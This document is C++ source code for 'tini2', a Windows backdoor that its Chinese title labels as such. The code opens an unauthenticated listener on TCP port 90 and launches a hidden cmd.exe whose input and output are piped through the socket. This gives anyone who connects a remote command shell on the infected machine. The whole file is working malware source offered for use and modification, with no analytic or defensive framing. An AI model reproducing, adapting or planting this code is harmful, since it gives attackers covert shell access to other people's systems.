tini2后门代码.cpp

五个C++程序源代码

////////////////////////////////////////////////////////////////////////////////
//      
//      Telnet Server. 
//      
//      File      : Tini2.cpp
//      
//      Create at : 2002.3.28
//      Create by : dancefire , refdom
//		Email	  : dangcefire@263.net , refdom@263.net
//
//		If you modify the code, or add more functions, please email me a copy.
//      
////////////////////////////////////////////////////////////////////////////////

#include <stdio.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
#pragma comment(lib, "kernel32.lib")

#define PORT 90

SOCKET ServerSocket = INVALID_SOCKET;
SOCKET ClientSocket = INVALID_SOCKET;
HANDLE hReadPipe, hWritePipe, hWriteFile, hReadFile;
u_char varA,varB;

DWORD WINAPI ThreadFuncA( LPVOID lpParam )
{
	SECURITY_ATTRIBUTES pipeattr;
	DWORD nByteToWrite, nByteWritten;
	char recv_buff[1024];

	pipeattr.nLength = sizeof(SECURITY_ATTRIBUTES);
	pipeattr.lpSecurityDescriptor = NULL;
	pipeattr.bInheritHandle = TRUE;
	CreatePipe(&hReadPipe,
				&hWriteFile,
				&pipeattr,
				0);

	varA = 1;
	while(true)
	{
		Sleep(250);
		nByteToWrite = recv(ClientSocket,
							recv_buff,
							1024,
							0);
		WriteFile(hWriteFile,
				recv_buff,
				nByteToWrite,
				&nByteWritten,
				NULL);
	}
	return 0;
}

DWORD WINAPI ThreadFuncB( LPVOID lpParam )
{
	SECURITY_ATTRIBUTES pipeattr;
	DWORD len;
	char send_buff[25000];

	pipeattr.nLength = sizeof(SECURITY_ATTRIBUTES);
	pipeattr.lpSecurityDescriptor = NULL;
	pipeattr.bInheritHandle = TRUE;

	CreatePipe(&hReadFile,
			&hWritePipe,
			&pipeattr,
			0);

	varB = 1;
	while (true)
	{
		ReadFile(hReadFile,
				send_buff,
				25000,
				&len,
				NULL);

		send(ClientSocket,
			send_buff,
			len,
			0);
	}
	return 0;
}

void main(void)
{
	WSADATA WSAData;
	struct sockaddr_in RemoteAddr;
	int nRetCode;
	DWORD dwThreadIdA,dwThreadIdB,dwThreadParam=0;
	OSVERSIONINFO osvi;
	PROCESS_INFORMATION processinfo;
	STARTUPINFO startinfo;

	WSAStartup(MAKEWORD(2,2),&WSAData);
	ServerSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
	RemoteAddr.sin_family = AF_INET;
	RemoteAddr.sin_port = htons(PORT);
	RemoteAddr.sin_addr.S_un.S_addr = INADDR_ANY;

	bind(ServerSocket,(LPSOCKADDR)&RemoteAddr,sizeof(RemoteAddr));
	listen(ServerSocket, 5);

	varA = 0;
	varB = 0;
	CreateThread(NULL, 0, ThreadFuncA, NULL, 0, &dwThreadIdA);
	CreateThread(NULL, 0, ThreadFuncB, NULL, 0, &dwThreadIdB);

	do{
        Sleep(250);
	}while((varA || varB) == 0);

	GetStartupInfo(&startinfo);
	startinfo.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
	startinfo.hStdInput = hReadPipe;
	startinfo.hStdError = hWritePipe;
	startinfo.hStdOutput = hWritePipe;
	startinfo.wShowWindow = SW_HIDE;

	osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);

	GetVersionEx(&osvi);
	char szAPP[256];
	GetSystemDirectory(szAPP,MAX_PATH+1);

	if(osvi.dwPlatformId == 2)
	{
		strcat(szAPP,"\\cmd.exe");
		if (CreateProcess(szAPP, NULL, NULL, NULL, TRUE, 0, 
							NULL, NULL, &startinfo, &processinfo) == 0)
		{
			printf ("CreateProcess Error!\n");
			return;
		}
	}
	else
	{
		strcat(szAPP,"\\command.exe");
		CreateProcess(NULL,
					szAPP,
					0,
					0,
					true,
					0,
					0,
					0,
					&startinfo,
					&processinfo);
	}

	while (true)
	{
        ClientSocket = accept(ServerSocket, NULL, NULL);
		Sleep(250);
	}
}